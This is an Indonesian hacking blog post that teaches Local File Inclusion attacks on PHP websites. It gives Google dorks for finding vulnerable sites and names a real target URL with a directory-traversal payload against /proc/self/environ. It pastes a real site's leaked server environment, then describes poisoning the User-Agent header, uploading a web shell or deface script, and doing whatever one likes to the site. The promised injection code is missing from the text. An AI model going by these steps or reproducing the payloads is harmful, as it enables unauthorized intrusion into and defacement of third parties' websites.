hallo Jones :D hihihihii
Lagi galau yaa ??? ,... dari pada galau mari kita belajar :D
Sebelum Bahas Tutorial LFI saya akan Jelasin Singkat Apa Itu LFI ? :)
LFI (Local File Inclusion) adalah sebuah lubang pada site di mana attacker bisa mengakses semua file di dalam server dengan hanya melalui URL. << udah cuma gitu awkakwkakwk .. Singkat kan ?? :D lebih jelas nya tanya WWW.GOOGLE.COM ya :D
Bahan yang Dibutuhkan :
1.rokok + Kopi Kapal Api
2.Camilan
3.Tamper Data (https://addons.mozilla.org/en-US/firefox/addon/tamper-data/)
4.shell / script file upload ..
5.Dork + Kesabaran Dalam Mencari Site Bug LFI , :D
Dork list :
inurl:.php?(*)=(*)php , inurl:.php?(*)=mapa.php , inurl:.php?caminho=(*)php , inurl:.php?(*)=Sitemap.php
ingat !! Harus Ada .php dibelakang = !!
Misal : inurl:.php?pg=mapa.php << harus ada .php !!
Cara Mencari Dork LFI !!
1. buka translate.google.com , hhaha
2.tulis text ente ke google translate yang berkaitan dengan file file di website !! Seperti = Sitemap , contact , daftar , dll ..
3.translate text yang kamu tulis ke berbagai bahasa .. misal sitemap , translate ke portugal jadi , mapa
4.masu''kan dork km ke google : inurl:.php?(*)=mapa.php << ingat Harus ada .php
5.Success !! ^_^
Oke Bahan Udah Lengkap + cara mencari Dork nya , tinggal Tutorialnya aja ya !! Ok Lest Go !!
1. kita nemuin website yang vuln LFI.
contoh : http://site.com/main.php?file=news.php
2.list target : http://www.ibriec.org/menara_perkebunan/index.php?open=../../../../../../../../../../proc/self/environ
3.coba kita ganti page_05.php pada list target diatas :
../../../../../../../../../proc/self/environ
4. Jika anda mendapatkan yang seperti ini :
SERVER_SIGNATURE=
Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.35 Server at baleman.co.id Port 80
UNIQUE_ID=Ua6ugso68-wAAF8wsfgAAAAKHTTP_USER_AGENT=Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0SERVER_PORT=80HTTP_HOST=baleman.co.idREDIRECT_HANDLER=application/x-httpd-php5DOCUMENT_ROOT=/home/s2400x14/public_htmlSCRIPT_FILENAME=/usr/local/cpanel/cgi-sys/php5REQUEST_URI=/index_1.php?hal=../../../../../../../../../../../proc/self/environSCRIPT_NAME=/cgi-sys/php5HTTP_CONNECTION=keep-alivePATH_INFO=/index_1.phpREMOTE_PORT=18429PATH=/usr/local/bin:/usr/bin:/binPWD=/usr/local/cpanel/cgi-sysSERVER_ADMIN=webmaster@baleman.co.idREDIRECT_STATUS=200REDIRECT_QUERY_STRING=hal=../../../../../../../../../../../proc/self/environHTTP_ACCEPT_LANGUAGE=en-US,en;q=0.5PATH_TRANSLATED=/home/s2400x14/public_html/index_1.phpHTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8REMOTE_ADDR=180.253.80.169SHLVL=0SERVER_NAME=baleman.co.idSERVER_SOFTWARE=Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.35QUERY_STRING=hal=../../../../../../../../../../../proc/self/environSERVER_ADDR=202.58.243.17GATEWAY_INTERFACE=CGI/1.1SERVER_PROTOCOL=HTTP/1.1HTTP_ACCEPT_ENCODING=gzip, deflateREDIRECT_URL=/index_1.phpREQUEST_METHOD=GETHTTP_COOKIE=__utma=247167511.668754680.1370401967.1370401967.1370401967.1; __utmb=247167511.1.10.1370401967; __utmc=247167511; __utmz=247167511.1370401967.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Home | Jad
atau keluar : Document ROOT dan ada User Agent Itu Web rentan LFI ,, OK Ternyata proc/self/environ dapat kita akses ! ^_^ Lest Go !
5.Sekarang mari kita injeksi dengan kode dengan meracuni http-headernya/User Agent , Tools yang Tadi (Tamper Data Udah Didownload kan ?? ^_^) Ok Kalau Sudah , Lanjut !!
6.buka tamper data di firefox lalu Buka URL Tadi Yang Rentan LFI , Klik Start Tamper lalu Reload Halaman Site !!
7.Muncul Kotak Box , jangan dicentang continue tampering .. , klik TAMPER
8.Pada Kolom/Kotak User agent , Hapus Text Tersebut ganti dengan code berikut :
9. Klik Oke .. , Stop Tamper !! Tamper data jangan di close ^_^
10.Selanjutnya Upload Shell / Script Deface anda
11.Success , Tinggal Diacak acak dalemnya , mau ngapain aja terserah deh :D :D
Woyy Woyy ,, jangan serius serius dong ,, kopi nya dulu di minum , rokok nya di hisap dulu broo :D
sekian dan terima kasih :D
Content Creator : ./V404
Sumber : IDCA
0 comments:
Post a Comment